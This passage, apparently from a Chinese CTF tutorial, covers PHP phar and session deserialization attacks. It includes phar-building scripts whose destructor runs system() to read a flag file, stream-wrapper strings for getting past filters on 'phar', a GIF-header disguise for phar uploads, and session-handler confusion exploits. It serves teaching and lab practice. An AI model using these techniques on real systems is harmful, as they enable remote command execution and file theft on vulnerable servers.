$phar->addFromString("test.txt", "test");//添加要压缩的文件
17
//签名自动计算
18
$phar->stopBuffering();
19
?>

上传后进行包含?file=phar://upload/62f305b4834b5.phar

1
<?php
2
class A {
3
    public $a;
4

5
    public function __destruct()
6
    {
7
        system($this->a);
8
    }
9
}
10
$b = new A();
11
$b->a='cat flag.php';
12
$phar = new Phar("test4.phar");//后缀名必须为phar
13
$phar->startBuffering();
14
$phar->setStub("<?php __HALT_COMPILER();?>");//设置stub
15
$phar->setMetadata($b);//将自定义的meta-data存入manifest
16
$phar->addFromString("test4.txt", "test4");//添加要压缩的文件
17
//签名自动计算
18
$phar->stopBuffering();
19
?>

生成新phar文件读取并输出flag.php文件的内容，同样上传后进行包含，查看源码即可得到flag

3. 过滤绕过#

3.1 当环境限制了phar不能出现在前面的字符里#

1
compress.bzip://phar:///test.phar/test.txt
2
compress.bzip2://phar:///test.phar/test.txt
3
compress.zlib://phar:///home/sx/test.phar/test.txt
4
php://filter/resource=phar:///test.phar/test.txt
5
php://filter/read=convert.base64-encode/resource=phar://phar.phar

3.2 验证文件格式#

php识别phar文件是通过其文件头的stub，更确切一点来说是__HALT_COMPILER();?>这段代码，对前面的内容或者后缀名是没有要求的。那么我们就可以通过添加任意的文件头+修改后缀名的方式将phar文件伪装成其他格式的文件。如下：

1
<?php
2
    class TestObject {
3
    }
4

5
    @unlink("phar.phar");
6
    $phar = new Phar("phar.phar");
7
    $phar->startBuffering();
8
    $phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub，增加gif文件头
9
    $o = new TestObject();
10
    $phar->setMetadata($o); //将自定义meta-data存入manifest
11
    $phar->addFromString("test.txt", "test"); //添加要压缩的文件
12
    //签名自动计算
13
    $phar->stopBuffering();
14
?>

加了GIF89a文件头，从而使其伪装成gif文件

session反序列化#

1. 序列化和反序列化session机制#

在计算机中，尤其是在网络应用中，称为“会话控制”。Session 对象存储特定用户会话所需的属性及配置信息。这样，当用户在应用程序的 Web 页之间跳转时，存储在 Session 对象中的变量将不会丢失，而是在整个用户会话中一直存在下去。当用户请求来自应用程序的 Web 页时，如果该用户还没有会话，则 Web 服务器将自动创建一个 Session 对象。当会话过期或被放弃后，服务器将终止该会话。

当第一次访问网站时，Seesion_start() 函数就会创建一个唯一的Session ID，并自动通过HTTP的响应头，将这个Session ID保存到客户端Cookie中。同时，也在服务器端创建一个以Session ID命名的文件，用于保存这个用户的会话信息。当同一个用户再次访问这个网站时，也会自动通过HTTP的请求头将Cookie中保存的Seesion ID再携带过来，这时Session_start()函数就不会再去分配一个新的Session ID，而是在服务器的硬盘中去寻找和这个Session ID同名的Session文件，将这之前为这个用户保存的会话信息读出，在当前脚本中应用，达到跟踪这个用户的目的。

除此之外，还需要知道session_start()这个函数已经这个函数所起的作用：

当会话自动开始或者通过 session_start() 手动开始的时候， PHP 内部会依据客户端传来的PHPSESSID来获取现有的对应的会话数据（即session文件）， PHP 会自动反序列化session文件的内容，并将之填充到 $_SESSION 超级全局变量中。如果不存在对应的会话数据，则创建名为sess_PHPSESSID(客户端传来的)的文件。如果客户端未发送PHPSESSID，则创建一个由32个字母组成的PHPSESSID，并返回set-cookie。

session 的存储机制php中的session中的内容不是放在内存中，而是以文件的方式来存储，存储方式由配置项session.save_handler来进行确定，默认是以文件的方式存储。存储的文件是以sess_sessionid来进行命名的。

常见的session存储路径

1
/var/lib/php5/sess_PHPSESSID
2
/var/lib/php7/sess_PHPSESSID
3
/var/lib/php/sess_PHPSESSID
4
/tmp/sess_PHPSESSID
5
/tmp/sessions/sess_PHPSESSED

php.ini中一些session配置

1
session.save_path="" --设置session的存储路径
2
session.save_handler=""–设定用户自定义存储函数，如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式)
3
session.auto_start boolen–指定会话模块是否在请求开始时启动一个会话默认为0不启动
4
session.serialize_handler string–定义用来序列化/反序列化session的处理器名字。默认使用php

2. 简单利用#

session反序列化的漏洞是由三种不同的反序列化引擎所产生的的漏洞

php_binary 存储方式是，键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值
php 存储方式是，键名+竖线+经过serialize()函数序列处理的值
php_serialize(php>5.5.4) 存储方式是，经过serialize()函数序列化处理的值

三种引擎的存储格式：

1
php : a|s:3:"wzk";
2
php_serialize : a:1:{s:1:"a";s:3:"wzk";}
3
php_binary : as:3:"wzk";

样例源码

1
<?php
2
//ini_set('session.serialize_handler', 'php');
3
ini_set("session.serialize_handler", "php_serialize");
4
//ini_set("session.serialize_handler", "php_binary");
5
session_start();
6
$_SESSION['lemon'] = $_GET['a'];
7
echo "";
8
var_dump($_SESSION);
9
echo "";
10
?>

1
<?php
2
ini_set('session.serialize_handler', 'php');
3
session_start();
4
class student{
5
    var $name;
6
    var $age;
7
    function __wakeup(){
8
        echo "hello ".$this->name."!";
9
    }
10
}
11
?>

攻击思路：

首先访问1.php，在传入的参数最开始加一个’|‘，由于1.php是使用php_serialize引擎处理，因此只会把’|‘当做一个正常的字符。然后访问2.php，由于用的是php引擎，因此遇到’|‘时会将之看做键名与值的分割符，从而造成了歧义，导致其在解析session文件时直接对’|‘后的值进行反序列化处理。

这里可能会有一个小疑问，为什么在解析session文件时直接对’|‘后的值进行反序列化处理，这也是处理器的功能？这个其实是因为session_start()这个函数，可以看下官方说明：

1
session_start () 会创建新会话或者重用现有会话。如果通过 GET 或者 POST 方式，或者使用 cookie 提交了会话 ID，则会重用现有会话。
2

3
当会话自动开始或者通过 session_start () 手动开始的时候，PHP 内部会调用会话管理器的 open 和 read 回调函数。会话管理器可能是 PHP 默认的，也可能是扩展提供的（SQLite 或者 Memcached 扩展），也可能是通过 session_set_save_handler () 设定的用户自定义会话管理器。通过 read 回调函数返回的现有会话数据（使用特殊的序列化格式存储），PHP 会自动反序列化数据并且填充 $_SESSION 超级全局变量。

3. 利用session.upload_progress进行反序列化攻击#

在PHP中还存在一个upload_process机制，即自动在$_SESSION中创建一个键值对，值中刚好存在用户可控的部分，可以看下官方描述的，这个功能在文件上传的过程中利用session实时返回上传的进度。 [session上传进度.png] 当题目中没有上面类似于PHP1写入$_SESSION全局变量时，可以利用session.upload_progress进行反序列化攻击。这种攻击方法与上一部分基本相同，不过这里需要先上传文件，同时POST一个与session.upload_process.name的同名变量（一般为PHP_SESSION_UPLOAD_PROGRESS）。后端会自动将POST的这个同名变量作为键进行序列化然后存储到session文件中。下次请求就会反序列化session文件，从中取出这个键。所以攻击点还是跟上一部分一模一样，程序还是使用了不同的session处理引擎。